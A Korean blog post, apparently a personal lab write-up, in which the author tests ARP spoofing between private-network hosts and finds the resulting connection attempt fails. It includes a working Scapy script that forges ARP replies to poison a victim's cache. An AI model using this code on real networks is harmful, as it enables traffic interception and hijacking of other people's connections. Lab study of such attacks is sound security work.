외로운 Nova의 작업실

ARP Spooping 공격 기법 - 1(연결 하이재킹 실험) 본문

Server Penetesting/Network

ARP Spooping 공격 기법 - 1(연결 하이재킹 실험)

Nova_ 2023. 4. 3. 13:49

- 취약점

ARP Reply응답을 인증하지않고 그대로 받아들이는 취약점을 이용합니다.

 

- 실험 주제

ARP Spooping 당한 희생자는 MAC에따라서 공격자에게 연결이 될까 아니면 IP에따라서 원래 대상자에게 될까?

 

- 실험 구성

공격자 : window 192.168.219.130 , 1C-1B-0D-A7-67-E1

희생자 : centos 192.168.219.120 , 00:0C:29:8C:2E:05

원래 대상자 : centos 192.168.219.100,  00:0C:29:CD:9A:77

 

- 실험 전

192.168.219.120 희생자의 arp cache table

맥번호와 IP가 잘 구성되어있는 것을 확인할 수 있습니다.

 

- 실험계획

1. ARP spooping으로 192.168.219.100의 MAC을 공격자의 MAC으로 변경합니다.

2. 바인드 텔넷을 이용하여 어디에 접속되는지 확인합니다.

 

- 실험 시작

아래는 ARP-reply 패킷을 생성하는 파이썬 코드입니다.

from scapy.all import *
import time

# ARP 응답 패킷 생성
arp_reply = Ether(dst='00:0C:29:8C:2E:05')/ARP(op='is-at', hwsrc='1C:1B:0D:A7:67:E1', psrc='192.168.219.100', hwdst='00:0C:29:8C:2E:05', pdst='192.168.219.120')

# 패킷 전송 10번
for i in range(0, 10):
    sendp(arp_reply)
    time.sleep(2)
    print("패킷 전송 완료")

 

 

<실제 ARP Spooping 공격>

 

<희생자의 arp cache table>

192.168.219.100 ip의 MAC이 공격자의 MAC으로 변경완료

 

<포트 열기>

 

<접속>

실제 arp 캐시 테이블이 변경된 상황에서 nc를 해봣을때 연결이 되지않았습니다. 이후 다시 arp 캐시 테이블을 살펴본결과 MAC 주소가 없어진 것을 확인할 수 있습니다. ARP 스푸핑으로는 연결을 가로챌 수 있는 건 아닌것 같습니다. 그렇다면 스니핑은 어떻게 하는걸까요? ARP redirection으로 게이트웨이 MAC주소를 스푸핑하여 스니핑이 가능한 것 같습니다. 한번 해보겠습니다.

Comments